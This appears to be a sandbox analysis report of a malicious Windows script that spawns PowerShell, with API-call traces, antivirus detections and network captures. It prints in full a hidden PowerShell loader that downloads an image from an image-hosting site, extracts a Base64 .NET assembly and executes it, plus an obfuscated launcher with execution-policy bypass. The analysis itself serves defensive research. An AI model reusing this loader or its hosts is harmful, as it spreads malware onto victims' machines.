heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049de000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2144
thread_handle: 0x00000578
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000580
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2240
thread_handle: 0x0000044c
process_identifier: 2236
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We;n˜œæÐUÓ(©sšÍÓ'pÙMDOWNGRD g@Z8^tßK²ÜÖo`sÎ-çïëØ¡súCéÀ ÿ 
Data received Q
Data received ‘
Data received AΑWüT7×ÂI’\œ¹]h*ÆUŠ•R[üÇubBT-ï¤Ó¶.½ã[4ðçmÿ¤O‡Ï_V–éÀ˖`D"HqF0D D5£ ;¥Œx™2H”)!*t]Dÿe© K÷G¤3s± 3±Æ}„>¹!]]w|ä¨úHe„W.v–U–Œ"
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received X­ä¡Ä!K,Ò6¥ÌT΄#µŸ³Èà‹3Ëzÿ ØÄFeH„LE¦ú‡lA.3ž¡=
Data sent yue;nlµZM•¹öZÆv¥´ۗŸnîoWøÈUHë/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAv€¦º€Mƒ­c·Á¦¹’ƍÍݧ±}eˆùן6kÅ_¯”ŠéwA4æiƒ„—æéò„jHá 8Í0¥wO5°pÖh4E*C,ëèw‹S˜5ߎpþdÞ>Àû.xAO.²W0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 185.196.8.176
Time & API Arguments Status Return Repeated

WSASend

buffer: kge;n :‹é:ý×°‹ÈúŠ£² ¬ÄRò@è!Ÿ@z/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

buffer: FBA6w} ¬+í)TiTo˃¸4,èër§'"²ëOÚäèƹ›¬ÁÀŒ ;’qO Ø "Š®ug„]0aü¥×¾Ãê÷E‰\J§RW}î‹Ë†P„WÙìõú3t$}şºè\¯Í¯
socket: 968
0 0

WSASend

buffer: Àz—Õ 6è)îtǽ—êÀa$Ðv¥ÌÒ&YøIظ(f<üěé5„û®Ó‡NO`¸s¸{pÎ,û^¢É\+õöÎL" 2^m©#. “ÓA§þõœÉRåI5Ž¼k ͛Dý3Þ\É$¢~904ärx¯~å´Ô=•½ŠW¢oÏ>¥ñŒN_ŽLÁ^;´qBÀïpùÌÀP‰ÄڞYûRÁg´MúuˆÈ²¼F²!…ÅmÃäù¼øÉ·I„žž
socket: 968
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
Time & API Arguments Status Return Repeated

WSASend

buffer: kge;n :‹é:ý×°‹ÈúŠ£² ¬ÄRò@è!Ÿ@z/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

buffer: FBA6w} ¬+í)TiTo˃¸4,èër§'"²ëOÚäèƹ›¬ÁÀŒ ;’qO Ø "Š®ug„]0aü¥×¾Ãê÷E‰\J§RW}î‹Ë†P„WÙìõú3t$}şºè\¯Í¯
socket: 968
0 0

WSASend

buffer: Àz—Õ 6è)îtǽ—êÀa$Ðv¥ÌÒ&YøIظ(f<üěé5„û®Ó‡NO`¸s¸{pÎ,û^¢É\+õöÎL" 2^m©#. “ÓA§þõœÉRåI5Ž¼k ͛Dý3Þ\É$¢~904ärx¯~å´Ô=•½ŠW¢oÏ>¥ñŒN_ŽLÁ^;´qBÀïpùÌÀP‰ÄڞYûRÁg´MúuˆÈ²¼F²!…ÅmÃäù¼øÉ·I„žž
socket: 968
0 0

send

buffer: yue;nlµZM•¹öZÆv¥´ۗŸnîoWøÈUHë/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1440
sent: 126
1 126 0

send

buffer: FBAv€¦º€Mƒ­c·Á¦¹’ƍÍݧ±}eˆùן6kÅ_¯”ŠéwA4æiƒ„—æéò„jHá 8Í0¥wO5°pÖh4E*C,ëèw‹S˜5ߎpþdÞ>Àû.xAO.²W0
socket: 1440
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2016
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe